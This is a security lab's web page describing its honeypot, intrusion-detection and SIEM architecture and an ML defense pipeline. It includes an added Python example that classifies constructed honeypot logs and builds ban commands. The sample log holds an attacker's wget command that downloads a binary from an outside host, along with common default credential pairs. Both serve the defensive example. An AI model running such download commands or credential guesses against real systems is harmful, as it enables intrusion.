RESEARCH HUB

Open Research

Methodologies, Data, & Publications

Our commitment to radical transparency means sharing our findings. Explore our peer-reviewed articles, operational datasets from our honeypot arrays, and detailed documentation on our AI and defense architectures.

<15min Response Time

Hub-Satellite Architecture.

A two-node defense model. The Hub runs the AI workloads, SIEM correlation, and automated response. The Satellite operates at the network edge, where IDS/IPS, network analysis, and deception systems form the first line of defense. The two nodes are connected through an encrypted mesh VPN.

Primary Node — Hub
HAL9000
  • Role: AI Lab · SIEM · Automation
  • Containers: 42+
  • GPU: NVIDIA RTX
  • Stack: Wazuh · ML Engine · n8n
  • OS: Ubuntu 24.04 LTS
Edge Node — Satellite
SENTINEL
  • Role: Edge Security · DNS · IDS
  • Services: 11 Active
  • IDS Rules: 105,000+
  • Stack: Suricata · Zeek · CrowdSec
  • Honeypots: 3 Systems

Six-layer security stack.

IDS / IPS
Suricata

Network intrusion detection with 105,000+ rules. Real-time packet inspection, protocol anomaly detection, and automatic threat blocking at wire speed.

Network Analysis
Zeek 8.0

Deep protocol analysis and traffic logging. Extracts metadata from every connection — SSH fingerprints, DNS queries, HTTP headers, TLS certificates, and anomalous behaviors.

SIEM
Wazuh

Centralized security event management. Correlates alerts from every source and adds file integrity monitoring, rootkit detection, and compliance auditing, with severity-based escalation of confirmed findings.

Threat Intelligence
CrowdSec

Collaborative threat intelligence with global IP reputation database. Community-driven block lists, behavior-based detection scenarios, and automated ban decisions.

Deception Systems
Honeypot Array

Three specialized honeypots capturing attack patterns across SSH, Telnet, FTP, SMB, MSSQL, MySQL, HTTP, SMTP, POP3, IMAP, and PostgreSQL.

ML Defense Engine
Adaptive Defense

Self-learning anomaly detection. Processes data from all security layers — honeypot interactions, IDS alerts, network flows — to identify emerging attack patterns and automate response.

Adaptive ML defense pipeline.

Security logs from honeypots, IDS, and network analysis flow through a machine learning pipeline that continuously learns attacker behavior patterns and adapts defenses automatically.

01
Ingest
Cowrie, Dionaea, and Heralding honeypot logs + Suricata alerts + Zeek network flows, synced every 5 minutes from the edge node
02
Extract
Feature extraction — source IPs, attack vectors, credential patterns, payload signatures, protocol anomalies, session behaviors
03
Classify
ML model classifies threats — brute force, exploit attempts, reconnaissance, data exfiltration, lateral movement, C2 communication
04
Correlate
Cross-reference with Wazuh SIEM events, CrowdSec global intel, and historical patterns to confirm threats and reduce false positives
05
Respond
Automated actions — IP bans via CrowdSec + Fail2ban, rule updates, real-time notifications, and model retraining with new threat data

Honeypot array.

Three specialized deception systems emulate vulnerable services to capture real attack patterns, credential stuffing lists, and malware payloads across multiple protocols.

SSH · Telnet
Cowrie
Medium-interaction SSH/Telnet honeypot. Records login attempts, shell commands executed by attackers, and file downloads in a sandboxed environment.
Captures: Credentials · Commands · Sessions
FTP · SMB · MSSQL · MySQL
Dionaea
Low-interaction honeypot for network services. Captures malware samples, exploit payloads, and shellcode targeting database and file sharing protocols.
Captures: Malware · Exploits · Payloads
HTTP · SMTP · POP3 · IMAP · PostgreSQL
Heralding
Credential capture honeypot across web and email protocols. Logs authentication attempts with full session metadata for threat intelligence feeds.
Captures: Credentials · Protocols · IPs
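The five pipeline steps above (ingest, extract, classify, correlate, respond) and the Cowrie capture described in the honeypot array, worked through end to end on constructed data. This is an added illustration, not the lab's own pipeline code: the ML classifier is replaced by fixed rules so the block runs offline, the log lines are made up (only the field names follow the real Cowrie eventid/src_ip/username/password/input schema and Suricata's eve.json event_type/src_ip/alert schema), the KNOWN_BAD set stands in for a CrowdSec reputation lookup, and the response step only assembles `cscli decisions add` command strings rather than executing them. Threshold values and durations are assumptions.

```python
"""Toy ingest -> extract -> classify -> correlate -> respond pipeline (added example)."""
import json
from collections import defaultdict

BRUTE_FORCE_FAILS = 5                                   # assumed threshold per source IP
BAN_DURATION = {"post_exploitation": "24h", "brute_force": "4h", "reconnaissance": "1h"}

# Constructed Cowrie JSON lines (real field names, invented values; TEST-NET addresses).
COWRIE_LOG = """
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","session":"a1"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","session":"a1","username":"root","password":"123456"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","session":"a1","username":"root","password":"admin"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","session":"a1","username":"admin","password":"admin"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","session":"a1","username":"root","password":"toor"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","session":"a1","username":"pi","password":"raspberry"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","session":"a1","username":"root","password":"password"}
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.9","session":"b2"}
{"eventid":"cowrie.login.success","src_ip":"198.51.100.9","session":"b2","username":"root","password":"root"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.9","session":"b2","input":"uname -a"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.9","session":"b2","input":"wget http://198.51.100.9/x86 -O /tmp/x86"}
{"eventid":"cowrie.session.file_download","src_ip":"198.51.100.9","session":"b2","url":"http://198.51.100.9/x86"}
{"eventid":"cowrie.session.connect","src_ip":"192.0.2.33","session":"c3"}
{"eventid":"cowrie.session.closed","src_ip":"192.0.2.33","session":"c3"}
"""

# Constructed Suricata eve.json lines (real field names, invented values).
SURICATA_EVE = """
{"event_type":"alert","src_ip":"203.0.113.7","dest_port":22,"alert":{"signature":"ET SCAN Potential SSH Scan","severity":2}}
{"event_type":"flow","src_ip":"192.0.2.33","dest_port":22}
"""

# Stand-in for a CrowdSec reputation lookup (constructed, not a real feed).
KNOWN_BAD = {"203.0.113.7"}


def ingest(*jsonl_blobs):
    """Step 1: parse newline-delimited JSON from every source, skipping blank lines."""
    return [json.loads(line) for blob in jsonl_blobs
            for line in blob.splitlines() if line.strip()]


def extract_features(events):
    """Step 2: per-source-IP counters for logins, credentials, commands, downloads, IDS alerts."""
    feats = defaultdict(lambda: {"connects": 0, "failed": 0, "success": 0, "creds": set(),
                                 "commands": 0, "downloads": 0, "ids_alerts": 0})
    for ev in events:
        ip = ev.get("src_ip")
        if not ip:
            continue
        f, eid = feats[ip], ev.get("eventid", "")
        if eid == "cowrie.session.connect":
            f["connects"] += 1
        elif eid in ("cowrie.login.failed", "cowrie.login.success"):
            f["failed" if eid.endswith("failed") else "success"] += 1
            f["creds"].add((ev.get("username"), ev.get("password")))   # credential pattern
        elif eid == "cowrie.command.input":
            f["commands"] += 1
        elif eid == "cowrie.session.file_download":
            f["downloads"] += 1
        elif ev.get("event_type") == "alert":
            f["ids_alerts"] += 1
    return feats


def classify(f):
    """Step 3: rule-based stand-in for the ML classifier."""
    if f["success"] and (f["commands"] or f["downloads"]):
        return "post_exploitation"          # logged in and did something: never benign on a honeypot
    if f["failed"] >= BRUTE_FORCE_FAILS:
        return "brute_force"
    if f["connects"] and not (f["failed"] or f["success"]):
        return "reconnaissance"             # touched the port, never tried to log in
    return "unclassified"


def correlate(ip, label, f, known_bad):
    """Step 4: count independent sources; a lone honeypot touch stays 'suspected' (no ban)."""
    sources = 1                             # the honeypot itself saw this IP
    sources += 1 if f["ids_alerts"] else 0  # Suricata corroborates
    sources += 1 if ip in known_bad else 0  # reputation feed corroborates
    confirmed = sources >= 2 or label == "post_exploitation"
    return ("confirmed" if confirmed else "suspected"), sources


def run_pipeline(cowrie_jsonl, eve_jsonl, known_bad):
    """Steps 1-4 for every source IP; returns a verdict dict keyed by IP."""
    verdicts = {}
    for ip, f in extract_features(ingest(cowrie_jsonl, eve_jsonl)).items():
        label = classify(f)
        status, sources = correlate(ip, label, f, known_bad)
        verdicts[ip] = {"label": label, "status": status, "sources": sources,
                        "distinct_creds": len(f["creds"]), "downloads": f["downloads"]}
    return verdicts


def respond(verdicts):
    """Step 5: build actions. Strings only; nothing is executed here."""
    actions = []
    for ip, v in verdicts.items():
        if v["status"] == "confirmed" and v["label"] in BAN_DURATION:
            actions.append(f"cscli decisions add --ip {ip} --duration "
                           f"{BAN_DURATION[v['label']]} --reason {v['label']}")
        else:
            actions.append(f"notify: {ip} {v['label']} ({v['sources']} source(s), no ban)")
    return actions


if __name__ == "__main__":
    verdicts = run_pipeline(COWRIE_LOG, SURICATA_EVE, KNOWN_BAD)
    for ip, v in verdicts.items():
        print(ip, v)
    print("\n".join(respond(verdicts)))
```

The point of the correlate step is the false-positive control: 192.0.2.33 connected to the SSH honeypot once and did nothing else, so with no IDS alert and no reputation hit it is reported but not banned, whereas 203.0.113.7 is banned because three independent sources agree. Retraining on the new data, the last item in the pipeline's respond step, is outside what this block shows.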

Threat feed.

Adaptive Defense Engine — real-time output (live monitoring feed)

Stay ahead of the threats.

We collaborate with researchers, institutions, and organizations to advance the field of autonomous defense.
